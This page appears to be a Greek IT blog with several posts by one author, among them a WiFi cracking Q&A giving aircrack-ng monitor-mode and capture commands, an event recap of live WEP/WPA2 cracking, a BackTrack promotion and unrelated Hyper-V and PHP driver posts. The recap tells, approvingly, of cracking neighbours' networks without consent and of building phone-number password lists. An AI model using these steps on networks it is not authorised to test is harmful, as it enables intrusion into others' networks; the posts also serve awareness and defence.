Αν και η αλήθεια είναι ότι λίγοι έχουν την σωστή εικόνα του Backtrack και πολλοί το διαφημίζουν ως εργαλείο για σπάσιμο ασύρματων δικτύων, που ουσιαστικά και αυτό είναι κάτι που μπορεί να γίνει από οπουδήποτε, λόγο ότι χρησιμοποιεί το aircrack. Ένας σωστός penetration tester ή security specialist πρέπει να το έχει από κοντά.

Κατεβάστε το

ISO (Pre-Final)

VM (beta)

BackTrack 4 - The Definitive Guide

coming soon...

Read more...
7 comments
1285 views

Αλήθειες και ψέματα για WiFi cracking

By Blackman, July 5, 2009

Κατα καιρούς έχουν υποθεί διάφορα για το σπάσιμο ενός wireless δικτύου και με αφορμή το συγκεκριμένο thread αποφάσισα να γράψω κάποια πράγματα για να λύσω και μερικές απορίες που μπορεί να υπάρχουν.

Ε: Μπορώ με το net stumbler ή το kismet ή kiswin να σπάσω κάποιο δίκτυό

Α: Όχι, τα συγκεκριμένα εργαλεία είναι για την συλλογή πληροφοριών ενό ασύρματου δικτύου. Αυτές τις πληροφορίες θα χρειαστεί κάποιος για να προχωρήσει στο wifi cracking στην συνέχεια.

-------------------

Ε: Προσπαθώ να συλλέξω στοιχεία χρησιμοποιόντας το net stumbler ή ακόμα και το aircrack και δεν έχω αποτέλεσμα.

Α: Πιθανόν να φταίει η ασύρματη κάρτα που χρησιμοποιείς. Δεν υποστηρίζουν όλες οι κάρτες την δυνατότητα του monitoring. Στην περίπτωση που χρησιμοποιείς Linux τα πρώτα βήματα που πρέπει να κάνεις είναι τα εξής

airmon-ng stop ath0

και παίρνεις απάντηση

-----------------

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

-----------------

και στην συνέχεια

airmon-ng start wifi0 9

(το κανάλι στο τέλος μπορεί να είναι όποιο άλλο)

και παίρνεις απάντηση

----------------

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

----------------

Στην παραπάνω περίπτωση αυτό που γίνεται είναι να λέμε στο σύστημα να χρησιμοποιήσει τους madwifi drivers (ή όποια άλλη αντίστοιχη λύση έχει η ασύρματη κάρτα). Εδώ είναι το σημείο που δεν μπορούν όλες οι ασύρματες κάρτες να το κάνουν. Συνήθως εκείνες που έχουν το chipset της Atheros κάνουν για την δουλειά.

Chipset Supported by airodump for Windows ? Supported by airodump for Linux ? Supported by aireplay for Linux ? HermesI YES (Agere driver)
YES (patched orinoco driver)
NO (firmware corrupts the MAC header) Prism2/3 NO, but see LinkFerret for an alternative YES (HostAP or wlan-ng driver), STA firmware 1.5.6 or newer required YES (PCI and CardBus only, driver patching required) PrismGT YES (PrismGT driver) FullMAC: YES (prism54 driver, SoftMAC: NOT YET (prism54usb)
YES (driver patching recommended) Atheros CardBus: YES (Atheros driver), PCI: NO (see CommView WiFi instead) YES (PCI and CardBus only, madwifi driver) YES (driver patching required) RTL8180 YES (Realtek driver) YES (rtl8180-sa2400 driver) UNSTABLE (driver patching required) Aironet YES? (Cisco driver) YES (airo driver, firmware 4.25.30 recommended) NO (firmware issue) Ralink NO YES (rt2500 / rt2570 driver) YES (driver patching required) Centrino b NO PARTIAL: the ipw2100 driver doesn't discard corrupted packets NO Centrino b/g NO YES (ipw2200 driver, 1.0.6 recommended) NO (firmware drops packets) Broadcom Old models only (BRCM driver) NOT YET (bcm43xx driver, Linux >= 2.6.14 required) NO TI (ACX100 / ACX111) NO UNTESTED (acx100 driver) NO ZyDAS 1201 NO YES (zd1211 driver)
NO Others (Marvel...) NO UNKNOWN NO

-----------------------------------------

Ε: Το σπασιμο του WEP είναι διαδικασία 5 λεπτών;

Α: Όχι. Δεν είναι διαδικασία 5 λεπτών. Σίγουρα θα χρειαστεί κάποιος πάνω από 5 λεπτά για να είναι σίγουρος ότι θα συλλέξει τις σωστές πληροφορίες (αν όντως είναι WEP)

Με την χρήση της εντολής: airodump-ng ath0

ο υπολογιστής θα συλλέγει πληροφορίες από όλα τα κοντινά δίκτυα και θα τις εμφανίσει

Σε αυτό το σημείο να σημειωθεί ότι ο χρόνος που μπορεί να χρειαστεί εξαρτάται από διάφορες λεπτομέριες όπως είναι η απόσταση που βρίσκεται το AP, η κωδικοποίηση, αλλά και το μέγεθος του κλειδιού. Επίσης σημαντικό ρόλο παίζει και αν στο συγκεκριμένο AP υπάρχει έστω και ένας client συνδεμένος επάνω του. Αν δεν υπάρχει client (η σύνδεση μεταξύ τους δημιουργεί κίνηση) τότε θα χρειαστεί περισσότερη ώρα για να έχουμε τα επιθυμητά αποτελέσματα. Αν σε όλα αυτά προσθέσουμε την ώρα που χρειάζονται και τα επόμενα βήματα (injections & cracking), τότε ο χρόνος δεν είναι πέντε λεπτά.

---------------------------------------------------

Ε: Πόσα IVs θεωρούνται αρκετά για να προχωρήσω σε σπάσιμο ενός WEP;

Α: Χρειάζονται 90-100.000 IVs, αλλά και αυτά εξαρτόνται από την κωδικοποίηση, την πολυπλοκότητα και το μέγεθος του κλειδιού

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000 IVs; if you're out of luck you may need two million IVs, or more.

------------------------------------------------------------

Ε: Μετά την χρήση του airodump-ng, κάτι δεν πάει καλά.

Α: Πιθανότατα το σύστημα δεν μάζεψε αρκετή πληροφορία για τον τύπο του encryption. Από προσωπική εμπειρία και μετά από μισή ώρα Monitoring με το airodump-ng 3 wep δίκτυα εμφανίστηκαν ως WPA2 μετά το σημείο που τα Beacons ξεπέρασαν τον αριθμό 180.

δίνοντας

airodump-ng ath0

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID              PWR RXQ Beacons    #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80   42 100     5240   178307 338   9 54 WEP WEP         teddy

------------------------------------------

E: Προσπαθώ να σπάσω ένα WPA/WPA2 δίκτυο, αλλά δεν...Τι κάνω λάθος;

Α: Πιθανόν προσπαθείς να συλλέξεις πληροφορίες από ένα AP που δεν έχει κάποιο client συνδεμένο επάνω του. Σε αυτή την παρίπτωση θα υπάρχει καθυστέρηση καθότι δεν μπορεί να επιτευχθεί το four way handshaking

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID              PWR RXQ Beacons    #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51        0    0   9 54 WPA2 CCMP   PSK teddy

BSSID              STATION            PWR Lost Packets Probes

μόλις κάποιος client συνδεθεί στο συγκεκριμένο AP τότε

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID              PWR RXQ Beacons    #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51      116   14   9 54 WPA2 CCMP   PSK teddy

BSSID              STATION            PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2   35     0      116

---------------------------------------------

Ε: Ωραία και αν κάποιος το καταφέρει αυτό μετά θα μπει στο δίκτυο μου που είναι με WPA2;

Α: Ηρεμία. Τα πράγματα δεν είναι τόσο τραγικά. (!!!) Αυτό που κατάφερε κάποιος κάνοντας το παραπάνω είναι απλά να φέρει τον υπολογιστή του σε θέση να κάνει επίθεση. Η επίθεση εν αντιθέση με το WEP cracking που γίνεται με injections και μαζεύοντας IVs, στην περίπτωση του WPA cracking μιλάμε για BRUTE FORCE password cracking & dictionary attacks. Συνεπώς ο επίδοξος cracker θα πρέπει να έχει μία λίστα με κωδικούς, όπου το aircrack θα χρησιμοποιεί για τις δοκιμές του. Συνεπώς αν έχεις αλλάξει τον default κωδικό με κάποιον άλλο πολύπλοκο τότε τα πράγματα είναι ήσυχα. Σίγουρα θα πρέπει να φροντίσεις ο κωδικός σου να μην βρίσκεται σε λίστες όπως οι παρακάτω:

http://www.phenoelit-us.org/dpl/dpl.html

http://www.freshwap.net/forums/e-books-tutorials/184578-default-wireless-password-list.html

http://dopeman.org/default_passwords.html

http://cirt.net/passwords

http://www.anameless.com/blog/default-passwords.html

---------------------------------------------

Ε: Έχασα σύνδεση με το ασύρματο που προσπαθούσα να σπάσω. Τι γίνεται τότε;

Α: Πάλι από την αρχή

----------------------------------------------

ΣΥΜΠΕΡΑΣΜΑΤΑ

Το WEP σπάει
Το σπάσιμο του WEP δεν γίνεται σε 5 λεπτά. Με 128bit κλειδί και μεγάλο και πολύπλοκο password o επίδοξος hacker μάλλον θα έχει άλλου τύπου σκέψεις για το άτομο σας.
Δεν κάνουν όλες οι ασύρματες κάρτες δικτύου για αυτή την δουλειά
Σε περίπτωση WPA/WPA2 εφόσον έχετε άλλαξει το default password με κάτι μη συνηθισμένο, τότε κοιμηθείτε ήσυχοι.
Σε περίπτωση που ο χρήστης του AP κλείσει ή κάνει restart το AP, τότε ο επίδοξος cracker πρέπει να ξαναξεκινήσει από την αρχή την συλλογή IVs (σε περιπτώσεις WEP)
To WPA/WPA2 σπάει με την χρήση GPUs (ο τρόπος είναι ο ίδιος, Bruteforce, αλλά η ταχύτητα αλλάζει, πάλι ήσυχοι κοιμάστε).
Ελπίζω να έλυσα αρκετές απορίες.

Υ.Γ. 1 Όλα τα παραπάνω γράφτηκαν ύστερα από πολλές και πολύωρες δοκιμές, κάτω από διάφορες καταστάσεις και περιπτώσεις και πάντα σε διαδικασία testing

Υ.Γ. 2 aircrack is a set of tools for auditing wireless networks:

airodump: 802.11 packet capture program
aireplay: 802.11 packet injection program
aircrack: static WEP and WPA-PSK key cracker
airdecap: decrypts WEP/WPA capture files

Read more...
1 comment
874 views

Hack My… IT Pro Connections

By Blackman, November 30, 2009

Διάβασα το άρθρο του Βαγγέλη και δεν κρατήθηκα. Έπρεπε να γράψω και εγώ. Να δώσω και εγώ την δική μου εικόνα και να ευχαριστήσω πολύ κόσμο για αυτό το event. Αρχικά να ευχαριστήσω τους διοργανωτές και δη τα μεγάλα κεφάλια του autoexec.gr (κοινώς moderators) που μου έκαναν την τιμή και με κάλεσαν σε αυτό το τόσο μεγάλο event. Ήταν το πρώτο μου και ευελπιστώ να ακολουθήσουν και άλλα.

Στην συνέχεια να ευχαριστήσω όλους όσους ήρθαν και παρακολούθησαν την εκδήλωση αυτή και η αίσθηση πραγματικά ήταν ξεχωριστή. Όπως ανέφερα, ήταν η πρώτη μου παρουσίαση, όχι γενικά, αλλά σε τέτοιο κοινό. Πρώτη φορά μίλησα σε συναδέλφους μου και φυσικά το υψηλό επίπεδο των ακροατών μου έδωσε ένα ξεχωριστό συναίσθημα.

Τέλος να ευχαριστήσω και τους υπόλοιπους ομιλητές, γιατί απλά είναι αυτοί που είναι. Ξεχωριστά άτομα ο καθένας τους. Καθώς ακόμα και τα υπόλοιπα παιδιά, behind the scenes για την εξαιρετική δουλειά τους. Το να ετοιμάζουν όλα αυτά είναι πραγματικά κάτι το ξεχωριστό. Νομίζω όλους τους τους ανέφερε ονομαστικά ο φίλος Βαγγέλης(την Παρασκευή στήναμε μέχρι το πρωί. Πολύ ξενύχτι λέμε)

Τέλος, last but not least, όπως λένε και οι φίλοι μας οι Αμερικάνοι, πολλά ευχαριστώ στον έτερο συνπαρουσιαστή Γιώργο ‘gspiliot’ Σπιλιώτη για την ωραία ομάδα που φτιάξαμε. Ενώ ο χώρος στο ξενοδοχείο Imperial έπαιξε σημαντικό ρόλο για την επιτυχία της εκδήλωσης.

Τα πράγματα για εμάς ήρθαν τόσο απλά, όσο ένα τηλεφώνημα…

-Μπορείς να σπάσεις live ασύρματο δίκτυο;

-Εύκολα…υπό προϋποθέσεις και ότι πρωτόκολλο θες.

-Μου αρκεί…

κάπως έτσι πήραμε το πρώτο οκ, για την παρουσία μας και εφόσον είχαμε δείξει κάποια δουλειά πάνω στο αντικείμενο (όσοι παρακολουθούν το Blog μου καταλαβαίνουν τι εννοώ).

Η δουλειά για εμάς ξεκίνησε από τον Ιούλιο. Συνεχείς δοκιμές για να hackάρουμε διάφορα δίκτυα και περισσότερο εκεί που δουλεύω, στην Αγία Παρασκευή. Ναι, για τις δοκιμές μας ίσως κάποιος από εσάς να περάσατε από το δικό μας σκανάρισμα και αν είχατε και WEP, τότε συνδεθήκαμε σε εσάς. Στις προσπάθειες μας, σπάσαμε γύρω στα 7 WEP από τα 8 που βρήκαμε εκείνη την περίοδο(ένα δεν είχε καλό σήμα), ενώ επίσης δύο με WPA2 με χρήση password list. (όλα αυτά για να έχουμε real life tests και όχι σε κατάσταση lab)

Στην συνέχεια, οι επόμενες επαφές έγιναν μαζί με τον Γιώργο τον Σεπτέμβρη, όπου αποφασίσαμε ότι θα δείξουμε και prehashed lists. Αρχικά πήγαμε να κατεβάσουμε μία λίστα που υπάρχει διαθέσιμη στο Internet και είναι μεγέθους 33GB, αλλά στην πορεία αποφασίσαμε να φτιάξουμε δικές μας για να γίνει και πιο εντυπωσιακό το όλο κατόρθωμα. Μας πήρε ΔΥΟ ΜΗΝΕΣ για να ολοκληρωθεί η παραγωγή αυτών των δύο prehashed lists. Δύο λίστες φυσικά που θα γίνουν ανάρπαστες μόλις τις βγάλουμε διαθέσιμες για κατέβασμα.

Με τι ασχοληθήκαμε; Όσοι παρακολούθησαν γνωρίζουν, αλλά κάποιοι ίσως να μην κατάλαβαν καλά. Η πρώτη και πιο μικρή λίστα, ήταν ΟΛΑ τα ανδρικά ονόματα με συνδυασμούς της ημερομηνίας γέννησης (πχ giwrgos1711980 ή Vangelis1956 ή όποιος άλλος συνδυασμός του ονόματος με κεφαλαία-πεζά και τους σχετικούς τρόπους γραφής καθώς και όλους τους τρόπους γραφής της ημερομηνίας). Ο μοναδικός περιορισμός ήταν ότι βάλαμε ημερομηνίες μετά το 1940.

Η δεύτερη prehashed list ήταν και η πιο δυνατή, καθώς πολύ απλά φτιάξαμε μία λίστα με ΟΛΑ ΤΑ ΚΙΝΗΤΑ ΤΗΛΕΦΩΝΑ ΤΗΣ ΕΛΛΑΔΑΣ. Ναι, σε αυτή την λίστα θα βρείτε τα κινητά σας και όποιου γνωστούς σας. Η συγκεκριμένη λίστα είναι ένα αρχείο 2GB και γράφτηκε σε Perl ώστε να γίνει ο υπολογισμός όλων των τηλεφώνων. Το σκεπτικό; Απλό. 69ΧΧΧΧΧΧΧΧ όπου Χ, όλα τα νούμερα από την αρχή. Φυσικά βγάλαμε και κάποια εκτός όπως το 691ΧΧΧΧΧΧΧ.

Με το παραπάνω ουσιαστικά ολοκληρώσαμε μετά από 3 μήνες προετοιμασίας την δουλειά μας και αφοσιωθήκαμε στην παρουσίαση αυτών.

Για να δούμε τι είδατε στην παρουσίαση μας.

Τι είναι WEP, WPA, WPA2 Personal/Enterprise

Πόσο εύκολα μπορεί κάποιος να κάνει την ζημιά, χωρίς ιδιαίτερο εξοπλισμό. Δείξαμε εκεί ένα Asus 701 4G (160€ πωλείται πλέον), το οποίο δεν είχε καν φορτωμένο το σχετικό λογισμικό, αλλά όλα μέσω ενός Live USB stick 1GB με Backtrack 3.

Ποιο είναι το σκεπτικό που ακολουθείται για να γίνει το wifi hacking (assosiation, deauthentication, ARP capture κλπ)

Με τι εργαλεία μπορεί να γίνει αυτό. Εμείς παρουσιάσαμε με aircrack-ng πάνω σε Backtrack 4

Τι να προσέχετε και τι να αποφεύγετε.

Τι χρειάζεται να έχετε αν θέλετε να δοκιμάσετε εσείς. Περιορισμούς από την ασύρματη κάρτα δικτύου (chipset, drivers κλπ)

Είδαμε Live Hacking σε WEP και δύο φορές σε WPA2 με password list και με prehashed list.

Ποια είναι η καλύτερη λύση, ειδικά για επιχειρησιακά περιβάλλοντα.
Η ροή ήταν η εξής: Τι είναι wifi & τα πρωτόκολλα –> Αλήθειες και ψέματα για wifi hacking –> ανάλυση WEP hacking –> Live WEP hacking –> ανάλυση WPA2 hacking –> live WPA2 hacking (2 τρόποι) –> Τρόποι προστασίας –> WPA 2 Entrerprise (WS2008, NAP, Radius)

Το πιο εντυπωσιακό της παρουσίασης ήταν όταν σηκώσαμε τον Βαγγέλη και έβαλε το δικό του password στο router, δίνοντας του τις δύο επιλογές που θα έπρεπε να επιλέξει για password (βάση των prehashed lists που είχαμε) και στην συνέχεια εφόσον μαζέψαμε τα σχετικά πακέτα το σπάσαμε σε περίπου δύο λεπτά με την χρήση της πρώτης prehashed λίστας. Ενώ να αναφέρω ότι το WEP που σπάσαμε ήταν ενός δικτύου που έτυχε να υπάρχει στην περιοχή(!!!), ενώ η περίπτωση του σπασίματος με password list έγινε έχοντας συμπληρώσει εμείς την σχετική λέξη σε μία αντίστοιχη λίστα.

Οι γνώστες πάνω σε ασύρματο hacking και των σχετικών πρωτοκόλλων νομίζω εκτίμησαν περισσότερο το live σπάσιμο, τόσο του WEP, αλλά περισσότερο του WPA2. Οι χρόνοι για να σπάσει ένα κλειδί με ονόματα και ημερομηνίες, όποια και να ήταν αυτά, είναι στα περίπου δύο λεπτά. Ενώ στην περίπτωση που ο ‘στόχος’ χρησιμοποιεί σαν κλειδί το κινητό του, με την άλλη λίστα χρειάζεται μέχρι δέκα λεπτά.

Η διαφορά μεταξύ μίας password list και μίας prehashed, είναι ότι για κάθε 1000 (χίλια) passwords στην πρώτη περίπτωση χρειάζεται 15 δευτερόλεπτα, ενώ στην περίπτωση prehashed list, θέλει 1 δευτερόλεπτο για να διαβάσει 100000 (εκατό χιλιάδες) passwords.

Οπότε να ξεκαθαρίσουμε κάτι σε όποιους δεν το κατάλαβαν την ώρα της παρουσίασης.

Η λίστα με τα κινητά δεν ήταν με τα κινητά όσων ήταν στην παρουσίαση, αλλά ΟΛΗΣ ΤΗΣ ΕΛΛΑΔΑΣ (εννοώντας όλων το ελληνικών εταιρειών παροχής κινητής τηλεφωνίας). (Πρέπει να το ανέφερα πολλές φορές αυτό ε;;

Όταν τρέχαμε το COWPUTTY (για να σπάσουμε το WPA2 με prehashed) όταν βλέπατε να αλλάζουν νούμερα στο πλάι, ήταν ανά εκατοντάδες χιλιάδες. (Η φωτογραφία πιο πάνω είναι από προσπάθεια αναζήτησης απλής password list)

Και ενώ μέχρι εδώ και ότι κάναμε με τον Γιώργο χρησιμοποιούσαμε Linux και ο Κλαδάκης είχε βγάλει τις κούκλες Voodoo, μήπως πάθουμε κάτι, ήρθαμε από μόνοι μας να αυτοσωθούμε από τα νύχια του. Ο λόγος είναι ότι η πιο αξιόπιστη λύση αυτή την στιγμή είναι με την χρήση WPA2 Enterprise, κάτι που δίνει ο Windows Server 2008 και στήνεται και σχετικά εύκολα.

Φυσικά το όνομα… HACK MY SPACE… δεν ήταν για να δείξουμε ότι μπορούμε να χακάρουμε το Myspace, αλλά τον προσωπικό χώρο του καθενός.

Σε αυτό το σημείο να έρθω να παραπονεθώ για αυτόν τον Μέρφυ αλλά και τους νόμους του και να ζητήσω συγνώμη για τις δύο περιπτώσεις που τα πράγματα δεν δούλεψαν όπως έπρεπε. Αλλά αυτό είναι το όμορφο του LIVE, το ότι το κάνει αυθεντικό. Στην πρώτη περίπτωση προσπαθώντας να κάνουμε injection στον WEP δίκτυο, η κάρτα του μηχανήματος μας έβλεπε άλλο κανάλι από αυτό που θα έπρεπε και του είχαμε δηλώσει. Πρόβλημα που κλασικά με μία επανεκκίνηση διορθώθηκε.

Το δεύτερο έγινε όταν πήγαμε να σπάσουμε το WPA2 με prehashed λίστα με τον κωδικό που είχε βάλει ο Βαγγέλης. Εκεί το πρόβλημα ήταν ότι ο client δεν είχε κάνει σωστά assosiate με το wifi spot (το έβλεπε unsecure), οπότε τότε βάλαμε τον φίλο μας Βαγγέλη να μας πληκτρολογήσει πάλι τον κωδικό του ώστε ο client να συνδεθεί σωστά και εμείς να πάρουμε τα σωστά πακέτα.

Νομίζω ότι ήμασταν οι μόνοι που ολοκληρώσαμε εντός χρόνου (ε κ. Κλαδάκη και έχοντας δείξει όλα τα πράγματα που θέλαμε. Όχι ότι θα λέγαμε όχι αν μπορούσαμε να σας πούμε αναλυτικά τον τρόπο γραφής των εντολών και την λογική σειρά που ούτως η άλλως αναλύσαμε.

Ελπίζω να σας άρεσε και να ήσασταν αρκετά αυστηροί στις βαθμολογίες σας με εμάς. Να αναφέρω γιατί κάποιοι με ρώτησαν… στην εισαγωγή μας όπου χρησιμοποίησα το σφυρί για να σπάσω το wifi, ναι…το βαρούσα κανονικά και όχι εικονικά.

Από εκεί και πέρα περιμένω τις ερωτήσεις σας σε αυτό το Blog Post και φυσικά προτάσεις που θα θέλατε να δείτε σε μελλοντικά blog posts μου ή του gspiliot.

Σας ευχαριστώ όλους και πάλι.

Read more...
18 comments
1868 views

Back to back...following your track...I'm using...Linux Backtrack

By Blackman, December 1, 2008

Χαμηλώστε τον φωτισμό...

βάλτε την πιο 'χακεροκομπιουτερίστικη' διάθεση σας...το πονηρό κρυμένο χαμόγελο που έχετε...και ελάτε να μπούμε μαζί στον κόσμο του Backtrack.

To backtrack είναι ένα Linux λειτουργικό σύστημα, βασισμένο στο Slackware και το οποίο είναι διαθέσιμο για χρήση άμεσα διότι μιλάμε για ένα λειτουργικό που τα έχει όλα εγκατεστημένα και είναι Live.

To remote-exploit.org χαρακτηρίζει το Backtrack ως "BackTrack is the most top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes."

Θέλετε κάτι άλλο από αυτό; Για να κάνετε ότι δοκιμές θέλετε, να τεστάρετε ότι θέλετε και να δοκιμάσετε τις γνώσεις σας όπου θέλετε;

Α ναι...θέλετε και κάτι άλλο.Να σας δείξω τι καλούδια θα βρείτε μέσα.

Ρίξτε μία ματιά στην φωτογραφία που ακολουθεί:

Αυτή που βλέπετε είναι η τελευταία έκδοση του Backtrack (3) και είναι final.

Αναλυτικά τα εργαλεία που υπάρχουν, με ανάλυση του τι είναι το καθένα μπορείτε να τα βρείτε ΕΔΩ (ΔΕΙΤΕ ΤΗΝ ΟΠΩΣ ΚΑΙ ΔΗΠΟΤΕ)

Μιλάμε για 30 προγράμματα Information Gathering, 30 προγράμματα Network Mapping, 65 προγράμματα Valnerability Identification, 12 προγράμματα Penetration, 48 προγράμματα Privilege Escalation, 16 προγράμματα maintaining access, 25 προγράμματα για ασύρματα δίκτυα (WiFi - Radio Network Analysis), 22 προγράμματα για bluetooth (bluetooth - Radion Network Analysis), 7 προγράμματα VOIP & Telephony Analysis, 13 προγράμματα Digital Forensics, 7 προγράμματα Reverse Engineering και επίσης καμιά 15 προγράμματα που δεν είναι σε κάποια κατηγορία. (συνολικά 290+ προγράμματα)

Φυσικά δεν χρειάζετε να αναφέρουμε, ότι είναι έτοιμο το σύστημα και στις υπόλοιπες κατηγορίες προγραμμάτων. Αφού θα βρείτε από το SKYPE, μέχρι OCR πρόγραμμα. Προσωπικά το θεωρώ καταπληκτικό σύστημα, καθότι απλά τα έχει όλα. Ως διαχειριστές συστημάτων, μπορείτε να κάνετε πολλές δοκιμές στο σύστημα σας και να δείτε πάρα μα πάρα πολλές πληροφορίες, εφόσον τα προγράμματα που έχει καλύπτουν όλο το φάσμα λειτουργιών μίας εταιρείας ασχέτως του λειτουργικού, τοπολογίας ή όποιας πολυπλoκότητας.

ΚΑΤΕΒΑΣΤΕ ΤΟ BACKTRACK ΤΩΡΑ!!!! (EINAI ...IT PRO MUST HAVE)

USB version & VMWare version

μπορείτε να το τρέξετε είτε ως Live CD, αλλά είτε να το κάνετε εγκατάσταση από το σχετικό κουμπί που έχει για αυτό τον σκοπό μέσα στο λειτουργικό.

Για τον τρόπο χρήσης του κάθε προγράμματος θα πρέπει να ψάξετε λίγο στο internet (πιστέψτε με, για το κάθε ένα υπάρχει αναλυτικός οδηγός χρήσης), από εκεί και πέρα, λίγο χρόνο να βρείτε και όρεξη για να "παίξετε" με το Backtrack και σίγουρα θα γίνετε και εσείς ένας από τους φανατικούς οπαδούς του (στους χιλιάδες που υπάρχουν ήδη).

http://securitydistro.com/gallery/100/BackTrack-3-Final-Screenshots.php

http://www.offensive-security.com/ (BackTrack's official site)

Back to back...following your track...I'm using...Linux Backtrack!

Don't you try...and don't deny...cause Backtrack will make you cry.

Read more...
7 comments
1338 views

Deploying Linux VM on Hyper-V 2008 R2 (How to)

By Blackman, August 3, 2010

Πριν λίγες ημέρες ο αγαπητός Hyper-Vangelis μας έφερε τα νέα για την RTM έκδοση των linux integration services για Hyper-V
http://autoexec.gr/blogs/hyper-vangelis/archive/2010/07/30/linux-integration-services-v2-1-for-windows-server-2008-hyper-v-r2.aspx
Εγώ από την σειρά μου έχοντας κάνει κάποιες δοκιμές, σκεφτόμουν πόσο ωραίο θα ήταν να έδειχνα το όλο σύστημα πως λειτουργεί, αλλά στην πορεία κατάλαβα ότι αυτό θα μου έπαιρνε πολύ χρόνο. Καταλαβαίνετε… διακοπές… μπάνια… καφέδες… θα έχανα την ‘ισορροπία’ του καλοκαιριού.
Αλλά έχω διαβάσει… έχω κάνει την μελέτη μου και αντί να το κάνω εγώ, είπα να σας το δείξω από εκεί που το έχουν κάνει άλλοι.

Εργαλεία
Αρχικά κατεβάζουμε τα Linux Integration Services
και είτε προχωράμε σε Windows Server 2008 R2 με τον Hyper-V ρόλο ή κατεβάζουμε το δωρεάν Hyper-V Server 2008 R2
Από πλευράς Linux μπορείτε να διαλέξετε ότι τραβάει η καρδιά σας, αλλά να ξέρετε ότι δεν είναι όλα δοκιμασμένα επίσημα, αλλά ανεπίσημα με μία έρευνα στο Internet θα δείτε ότι ένα πολύ μεγάλο μέρος distributions έχει ήδη δοκιμαστεί σε Hyper-V. Καλό θα ήταν πάντως να προτιμήσετε Server distributions, όπως έχω αναφέρει και ΕΔΩ αν και πολλές commercial distributions μετατρέπονται σε server πολύ εύκολα με μερικές επιπλέον εγκαταστάσεις προγραμμάτων από τα διαθέσιμα repositories.
Αν θέλετε να έχετε γεύση από την λίστα των distributions (updated 2009) δείτε τα παρακάτω blog posts μου.
Διανομές Linux (Τα άπαντα) – Part 1
Διανομές Linux (Τα άπαντα) – Part 2
Διανομές Linux (Τα άπαντα) – Part 3
Διανομές Linux (Τα άπαντα) – Part 4
Εγκατάσταση Hyper-V
Από εκεί τα πράγματα ξεκινάνε για εμάς…
Μπορείτε να ακολουθήσετε τις οδηγίες του φίλτατου Βαγγέλη για την περίπτωση του Hyper-V Server 2008 R2
http://autoexec.gr/blogs/hyper-vangelis/archive/2009/01/17/hyper-v-server-2008-r2-step-by-step.aspx
ή το βίντεο Hyper-V Server 2008 R2: Bare Metal to Live Migration (In about an hour!)
(όπου καλό να έχετε και το Poster του για να ξέρετε (αν δεν ξέρετε) για τι μιλάμε http://autoexec.gr/blogs/hyper-vangelis/archive/2010/06/21/hyper-v-r2-componet-architecture-poster.aspx )
Ενώ σε περίπτωση που δουλεύετε μέσα από Windows Server 2008 R2 και θα βάλετε τον Hyper-V ρόλο τότε ακολουθήστε τα παρακάτω
http://technet.microsoft.com/en-us/library/cc732470(WS.10).aspx

Linux Deployment on Hyper-V
Για αυτό το κομμάτι υπάρχουν δύο βίντεο διαθέσιμα για να παρακολουθήσετε το πώς γίνεται τόσο σε Red Hat Enterprise Linux όσο και σε Ubuntu Server 9.10

Backup & Recovery
Εφόσον καταφέρετε το παραπάνω, επόμενο στάδιο είναι το Backup & το Recovery αυτών των εικονικών μηχανών. Σε αυτό το σημείο μπορείτε να διαβάσετε το άρθρο από το blog του John Kelbley με όνομα Backup and Recovery of Non-Windows VMs on Hyper-V – IT JUST WORKS!
Ενώ μην ξεχνάμε ότι και ο Vangelis έχει γράψει σχετικά για disaster recovery, που ίσως το βρείτε σαν εναλλακτική λύση
http://autoexec.gr/blogs/hyper-vangelis/archive/2010/05/18/v-disaster-recovery-for-free.aspx

Νομίζω με όλα τα παραπάνω πέρνετε μία εικόνα για το πως λειτουργεί το σύστημα και φυσικά να το δοκιμάσετε και εσείς. Όπως λέει και ο Vag... Virtualize Everything... ακόμα και τους πιγκουίνους!

Read more...
2 comments
794 views

SQL Server Driver for PHP 2.0

By Blackman, April 20, 2010

Όπως αναφέρει το port25, η Microsoft ανακοίνωσε σήμερα στο συνέδριο DrupalConf την Community Technology Preview (CTP) έκδοση του νέου SQL Driver για PHP 2.0 με υποστήριξη για PHP Data Objects.
Φυσικά αυτό για τους developers είναι ένα μεγάλο βήμα, καθώς θα τους είναι πιο εύκολο να συνδεθούν με τον SQL, καθώς οι περισσότερες (όπως και η νέα έκδοση του Drupal 7) να διαλειτουργήσει (interoperate) ομαλά με τις τελευταίες εκδόσεις του SQL Server.
Η συγκεκριμένη έκδοση (κάτι σαν τις αντίστοιχες RC) δίνει την δυνατότητα στους χρήστες να δουν το νέο εργαλείο και φυσικά να κάνουν τις παρατηρήσεις τους, ώστε να επηρεάσουν την τελική έκδοση του προγράμματος που θα βγει μετά το δεύτερο μισό αυτού του έτους.

Προσωπική άποψη είναι ότι με το συγκεκριμένο εργαλείο, ανοίγονται τεράστιοι ορίζοντες για πολλά πράγματα για να γίνουν. Open Source προγράμματα που πλέον μπορούν να συνδεθούν με SQL server (αντί συνήθως με MySQL και άλλες βάσεις) και φυσικά περισσότεροι προγραμματιστές πλέον μπορούν να εκμεταλλευτούν τις δυνατότητες του MS SQL για να πετύχουν το στόχο τους.
Ένα πρόγραμμα που έχει τέτοια δυνατότητα επιλογής βάσης δεδομένων το κάνει πολύ ευέλικτο στην αγορά και με τον συγκεκριμένο driver η Microsoft κάνει πλέον πολύ δυνατούς τους εκάστοτε PHP developers.
Για περισσότερες πληροφορίες…
http://port25.technet.com/archive/2010/04/19/announcing-the-sql-server-driver-for-php-2-0.aspx
